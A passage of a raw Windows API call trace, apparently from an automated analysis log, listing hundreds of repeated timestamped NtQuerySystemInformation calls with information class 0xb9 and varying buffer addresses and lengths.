(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x50, ResultLength=0x0) [0283.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x50, ResultLength=0x0) [0283.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x50, ResultLength=0x0) [0283.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x38, ResultLength=0x0) [0283.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c900, Length=0x28, ResultLength=0x0) [0283.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c900, Length=0x28, ResultLength=0x0) [0283.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c900, Length=0x28, ResultLength=0x0) [0283.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c900, Length=0x28, ResultLength=0x0) [0283.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c970, Length=0x28, ResultLength=0x0) [0283.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x38, ResultLength=0x0) [0283.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x28, ResultLength=0x0) [0283.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x28, ResultLength=0x0) [0283.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c890, Length=0x20, ResultLength=0x0) [0283.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c810, Length=0x20, ResultLength=0x0) [0283.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c810, Length=0x20, ResultLength=0x0) [0283.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c810, Length=0x20, ResultLength=0x0) [0283.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x38, ResultLength=0x0) [0283.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x38, ResultLength=0x0) [0283.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c950, Length=0x20, ResultLength=0x0) [0283.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8e0, Length=0x20, ResultLength=0x0) [0283.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8e0, Length=0x20, ResultLength=0x0) [0283.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x50, ResultLength=0x0) [0283.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x50, ResultLength=0x0) [0283.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x50, ResultLength=0x0) [0283.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x50, ResultLength=0x0) [0283.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x50, ResultLength=0x0) [0283.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x50, ResultLength=0x0) [0283.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x50, ResultLength=0x0) [0283.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x38, ResultLength=0x0) [0283.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c900, Length=0x28, ResultLength=0x0) [0283.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c900, Length=0x28, ResultLength=0x0) [0283.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c900, Length=0x28, ResultLength=0x0) [0283.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c900, Length=0x28, ResultLength=0x0) [0283.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c970, Length=0x28, ResultLength=0x0) [0283.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x38, ResultLength=0x0) [0283.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x28, ResultLength=0x0) [0283.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x28, ResultLength=0x0) [0283.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c890, Length=0x20, ResultLength=0x0) [0283.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c810, Length=0x20, ResultLength=0x0) [0283.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c810, Length=0x20, ResultLength=0x0) [0283.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c810, Length=0x20, ResultLength=0x0) [0283.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x38, ResultLength=0x0) [0283.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x38, ResultLength=0x0) [0283.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c950, Length=0x20, ResultLength=0x0) [0283.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8e0, Length=0x20, ResultLength=0x0) [0283.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8e0, Length=0x20, ResultLength=0x0) [0283.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d270, Length=0x28, ResultLength=0x0) [0283.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1b8, Length=0x28, ResultLength=0x0) [0283.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1b8, Length=0x28, ResultLength=0x0) [0283.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1b8, Length=0x28, ResultLength=0x0) [0283.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1b8, Length=0x28, ResultLength=0x0) [0283.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1b8, Length=0x28, ResultLength=0x0) [0283.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1b8, Length=0x28, ResultLength=0x0) [0283.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1b8, Length=0x28, ResultLength=0x0) [0283.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d120, Length=0x20, ResultLength=0x0) [0283.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d120, Length=0x20, ResultLength=0x0) [0283.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1b8, Length=0x28, ResultLength=0x0) [0283.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x40, ResultLength=0x0) [0283.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x40, ResultLength=0x0) [0283.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfe0, Length=0x20, ResultLength=0x0) [0283.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfe0, Length=0x20, ResultLength=0x0) [0283.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x40, ResultLength=0x0) [0283.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x40, ResultLength=0x0) [0283.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x40, ResultLength=0x0) [0283.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d090, Length=0x20, ResultLength=0x0) [0283.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d090, Length=0x20, ResultLength=0x0) [0283.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d090, Length=0x20, ResultLength=0x0) [0283.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x40, ResultLength=0x0) [0283.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0c0, Length=0x20, ResultLength=0x0) [0283.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d060, Length=0x20, ResultLength=0x0) [0283.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d060, Length=0x20, ResultLength=0x0) [0283.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x40, ResultLength=0x0) [0283.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x40, ResultLength=0x0) [0283.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x40, ResultLength=0x0) [0283.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x40, ResultLength=0x0) [0283.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0283.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0283.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0283.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0283.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0283.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0283.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0283.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0283.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0283.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0283.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0283.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0283.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0283.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0283.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0283.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0283.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0283.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0283.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0283.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0283.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0283.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0283.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0283.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0283.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0283.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0283.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0283.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.426] NtQuerySystemInformation 